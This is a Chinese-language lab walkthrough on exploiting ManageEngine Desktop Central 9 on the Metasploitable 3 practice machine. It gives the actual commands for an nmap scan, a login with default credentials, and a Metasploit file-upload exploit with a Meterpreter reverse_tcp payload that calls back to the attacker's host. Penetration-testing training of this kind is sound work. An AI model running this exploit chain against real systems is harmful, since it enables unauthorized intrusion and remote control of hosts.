在使用Windows Server 2008设置虚拟机之后,安装脚本安装并配置了所有易受攻击的服务和应用程序。其中一个易受攻击的应用程序是ManageEngine Desktop Central 9.此版本的ManageEngine Desktop Central 9包含多个漏洞,允许我们上传文件并在目标系统上执行命令。这两个漏洞在2015年已由供应商修补。在我们开始利用这些漏洞之前,让我们先看看ManageEngine Desktop Central 9的用途。
ManageEngine Desktop Central是一个集成的桌面和移动设备管理应用程序,可帮助系统管理员从中央位置管理服务器,客户端设备和移动设备。该软件包括补丁管理,软件部署,远程控制和许多其他功能来管理IT资产和配置。ManageEngine Desktop Central通过在Metasploitable 3上的端口8383上运行的Web应用程序进行管理。
利用ManageEngine Desktop Central 9
让我们开始在Metasploitable 3目标上运行Nmap服务扫描,以获得有关此机器上运行的服务的概述。通过向命令添加-p-标志,而不是扫描Nmap 1.000公共端口范围,我们将在所有65.536 TCP端口上运行扫描。通过运行以下命令来启动扫描:
nmap -sV -p- 172.28.128.3
Metasploitable 3 Nmap扫描
扫描结果表明Metasploitable 3计算机正在运行大量服务,包括端口8383上的Apache HTTPD服务。
访问Desktop Central管理界面
让我们通过从浏览器访问以下URL来验证Apache是否正在运行ManageEngine Desktop Central 9 Web界面:
https://172.28.128.3:8383
ManageEngine Desktop Central登录页面
当我们使用浏览器访问URL时,我们会看到一个登录页面。页面右侧的登录表单指示默认凭证。我们只需按'登录'按钮,因为已经在登录中输入了凭据:
ManageEngine桌面默认凭据
点击“登录”按钮会将我们转到Desktop Central 9管理员页面。
从这一点上,应该很容易在目标机器的shell中变成这个新的访问级别。这通常可以通过查找已知漏洞或通过(错误)使用此软件的默认功能来完成。特别是在像Desktop Central这样敏感且功能丰富的应用程序中,这不应该太难。为了将常规功能转换为shell,我们应该寻找上传文件,安装插件,编辑系统文件和其他任何允许我们在目标系统上执行代码或命令的功能。
搜索有趣的信息
在这一点上采取的另一个重要步骤是在这个更新的访问级别上搜索(敏感)有趣的信息。有趣的信息是可以帮助我们进一步识别漏洞和开发过程的信息。有趣的信息包括版本和内部版本号,凭证,管理员笔记,票据,配置参数,系统信息以及任何其他信息,这些信息会告诉我们关于目标的一些有趣信息。
在管理面板的标题中,我们可以找到版本号和内部版本号:ManageEngine Desktop Central 9 Build 91084.这是一个很好的信息,可用于搜索此特定版本和Desktop Central 9的已知漏洞。
ManageEngine Desktop Central管理页面
当我们在Google上搜索此版本的Desktop Central的已知漏洞并利用代码时,我们会在Rapid 7网站的下一页快速结束:
https://www.rapid7.com/db/modules/exploit/windows/http/manageengine_connectionid_write
Rapid7 ManageEngine Desktop Central FileUploadServlet ConnectionId漏洞描述。
正如我们所看到的,版本号和内部版本号与管理面板上的号码完全一致。下面我们来从Metasploit运行这个漏洞。
利用Metasploit开发Desktop Central 9
在以下步骤中,我们将在Metasploitable 3机器上获得shell访问权限。通过运行以下命令启动Metasploit:
msfconsole
在msfconsole上运行以下命令以选择我们之前在Rapid 7网站上发现的ManageEngine Desktop Central漏洞:
use exploit / windows / http / manageengine_connectionid_write
Msfconsole开始了。
'show options'命令显示我们必须设置3个必需的选项:
- RHOST:目标主机IP
- RPORT:运行ManageEngine Desktop Central Web界面的端口。
- TARGETURI:ManageEngine Desktop Central Web界面的基本路径。
我们将保持targeturi和rport值为默认值。这要求我们只通过运行以下命令来设置目标主机参数:
set RHOST 172.28.128.3
manageengine_connectionid_write选项利用。
最后,我们用下面的命令指定有效载荷及其必填字段:
set payload windows/ meterpreter / reverse_tcp
set lhost 172.28.128.4
Meterpreter有效负载设置。
最后输入'run'或'exploit'来执行漏洞利用。
Metasploitable 3上的Meterpreter shell
如果一切顺利,我们现在在Metasploitable 3主机上有一个shell。从这一点上,我们可以研究特权升级和运行后期开发技术。Metasploitable 3机器包含更多漏洞
本文作者为Mr.Bai,转载请注明。
